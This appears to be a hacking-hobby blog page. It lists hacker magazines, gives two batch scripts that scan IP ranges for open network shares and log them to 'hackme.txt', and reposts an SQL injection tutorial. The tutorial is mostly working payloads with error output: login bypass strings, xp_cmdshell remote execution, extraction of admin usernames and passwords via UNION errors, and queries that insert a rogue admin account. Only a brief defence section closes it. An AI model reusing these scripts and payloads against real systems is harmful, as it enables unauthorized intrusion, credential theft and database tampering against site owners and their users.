Opera is the most convenient web browser, and use ur dam brain, and u caaaannn duu ihthttttt
Posted by at 1 comment:

Hacker Mags you Might Not Know About

Ok, you may have heard of (or Read) of the "Hacker Mag" 2600. Basically it is an "underground" (I am using that term very loosely) magazine related to the hacker scene. Well you may not know it, but there are a lot of other hacker magazines out there. I have listed the ones I know about (both print and E-Zines) hopefully there will be some that you may have not heard about.
* PRINTED MAGAZINES
2600
http://www.2600.com
Pretty much the most "mainstream" hacker mag. I don't really have a strong opinion on this mag either way.. Probably don't have to talk much about it, as I am sure most of you have read it before.
Blacklisted 411
http://www.blacklisted411.com
Old-school mag that is back in print.. I just got my first issue (didn't know it came back) and so far I really like it. Very technical & a lot of hardware projects. Probably my favorite out of the bunch..
BinaryRevolution
http://www.binrev.com/
I have just read though the 3 releases, and so far really like it. Seems to be like 2600 back in the day. Probably a close 2nd in order of my favorites, they don't have a set "release" time, they release it as they have material.
MakeZine
http://make.oreilly.com/
If you like to tweak, disassemble, re-create, and invent cool new uses for technology, you'll love MAKE our new quarterly publication for the inquisitive do-it-yourselfer. Every issue is packed with projects to help you make the most of all the technology in your life.
Radical Future
http://www.radicalfuture.tk
Checking it out now, so far its pretty good because you can d/l pdf's of the mag..
Dig
http://digzine.com
Deals with Technology, Art, & science. Available online as well.
Infiltration
http://www.infiltration.org/zine.html
A zine about going places you're not supposed to go, is a paper publication devoted to the art of urban exploration.
Adbusters
http://adbusters.org
* E-Zines
Phrack
http://www.phrack.com/
The classic Hacker Zine. Unfortunately #63 will the last..
"Since 1985, PHRACK MAGAZINE has been providing the hacker community with information on operating systems, network technologies and telephony, as well as relaying features of interest for the international computer underground."
UPL
http://phonelosers.org/upl/index.html
Phonelosers.org's phreak & prank zine
Telecomunists
http://telecom-munist.phonelosers.org
Another Phonelosers related phreak zine, might be dead..
Phreakazoid
http://www.phreaksandgeeks.com/
Another "might be dead" phreaking zine
Posted by at 1 comment:

Getting Someones IP Address,

Open notepad.exe and then copy and paste this script save it as netview.bat
echo off
prompt ~
IF EXIST C:\a\ del /q C:\a\*
IF NOT EXIST C:\a\ mkdir C:\a\
cls
echo.
echo.
echo.
echo TYPE THE IP ADRESS IN THE FORM (w.x.y.z)
echo.
echo.
echo w=
set /p w=
echo x=
set /p x=
echo y=
set /p y=
echo z=
set /p z=
set count=0
:10
set ipadd=%w%.%x%.%y%.%z%
cls
echo %ipadd%
REM --------- CHECKING IP TO SEE IF ONLINE
ping -n 1 -l 10 -f -w 1 %w%.%x%.%y%.%z% >> C:\ping5.txt
findstr "Reply" C:\ping5.txt
If %errorlevel% EQU 0 GOTO :NETVIEW
del C:\ping5.txt
:IPCOUNTER
set /a count=%count%+1
If %w% EQU 255 If %x% EQU 255 If %y% EQU 255 If %z% EQU 255 (cls && echo The number of combinations is %count%)
If %x% EQU 255 If %y% EQU 255 If %z% EQU 255 (Set /a w=%w%+1 && Set x=0 && Set y=0 && Set z=0 && goto :10)
If %y% EQU 255 If %z% EQU 255 (Set /a x=%x%+1 && Set y=0 && Set z=0 && goto :10)
If %z% EQU 255 (Set /a y=%y%+1 && Set z=0 && goto :10)
set /a z=%z%+1
GOTO :10
:NETVIEW
del C:\ping5.txt
echo ^e^cho off >> C:\a\view%w%.%x%.%y%.%z%.bat
echo net view \\%w%.%x%.%y%.%z% ^>^> F:\a\view%w%.%x%.%y%.%z%.txt >> C:\a\view%w%.%x%.%y%.%z%.bat
echo exit >> C:\a\view%w%.%x%.%y%.%z%.bat
start C:\a\view%w%.%x%.%y%.%z%.bat
GOTO :IPCOUNTER
---------------------------------------------------------------
this one too
Save it as search.bat
echo off
prompt ~
cls
echo.
echo.
echo.
echo TYPE THE STARTING IP ADRESS IN THE FORM (w.x.y.z)
echo.
echo.
echo w=
set /p w=
echo x=
set /p x=
echo y=
set /p y=
echo z=
set /p z=
set count=0
:10
echo C:\a\view%w%.%x%.%y%.%z%.txt
IF EXIST C:\a\view%w%.%x%.%y%.%z%.txt GOTO :FIND
:BACK
del C:\a\view%w%.%x%.%y%.%z%.txt
del C:\a\view%w%.%x%.%y%.%z%.bat
set /a count=%count%+1
If %w% EQU 255 If %x% EQU 255 If %y% EQU 255 If %z% EQU 255 (cls && echo The number of combinations is %count%)
If %x% EQU 255 If %y% EQU 255 If %z% EQU 255 (Set /a w=%w%+1 && Set x=0 && Set y=0 && Set z=0 && goto :10)
If %y% EQU 255 If %z% EQU 255 (Set /a x=%x%+1 && Set y=0 && Set z=0 && goto :10)
If %z% EQU 255 (Set /a y=%y%+1 && Set z=0 && goto :10)
set /a z=%z%+1
cls
GOTO :10
:FIND
FINDSTR Share C:\a\view%w%.%x%.%y%.%z%.txt
If %errorlevel% EQU 0 echo %w%.%x%.%y%.%z% >> C:\SHAREIP.txt
IF %ERRORLEVEL% EQU 0 type C:\a\view%w%.%x%.%y%.%z%.txt >> C:\hackme.txt
GOTO :BACK
Posted by at No comments:

Detailed Sql Injection tut

No I did not write this. I was trolling around and found this a bit useful so im sharing it here. Creds to the one who made this tut.
====================
SQL Injection
It's a trick to inject SQL query(commend) as an input possibly by web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
You can do this with any Browser.
What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:
Everything between the
and
have potential parameters that might be useful (exploit wise).
What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:
http://duck/index.asp?id=10
How do you test if it is vulnerable?
Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--
If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:
If luck is on your side, you will get login without any login name or password.
But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:
http://duck/index.asp?category=food
In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
SELECT * FROM product WHERE PCategory='food'
The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.
Now, assume that we change the URL into something like this:
http://duck/index.asp?category=food' or 1=1--
Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".
However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
How do I get remote execution with SQL injection?
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using double quote (") if single quote (') is not working.
The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:
#tcpdump icmp
If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.
How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
But the target IP must folder "share" sharing for Everyone.
How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:
http://duck/index.asp?id=10
We will try to UNION the integer '10' with another string from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-
This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".
To get the next table name, we can use the following query:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
We also can search for data using LIKE keyword:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".
How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
Now that we have the first column name, we can use NOT IN () to get the next column name:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5
When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.
Now, let's get the first login_name from the "admin_login" table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5
We can now login as "neo" with his password "m4trix".
How to get numeric string value?
There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.
To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:
http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5
Now, you can even login as 'trinity' with the password '31173'.
How to update/insert data into the database?
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":
http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--
To INSERT a new record into the database:
http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
We can now login as "neo2" with the password of "newpas5".
How to avoid SQL Injection?
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie
For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.
Change "Startup and run SQL Server" using low privilege user in SQL Server Security
tab.
Posted by at No comments:
Subscribe to: Posts (Atom)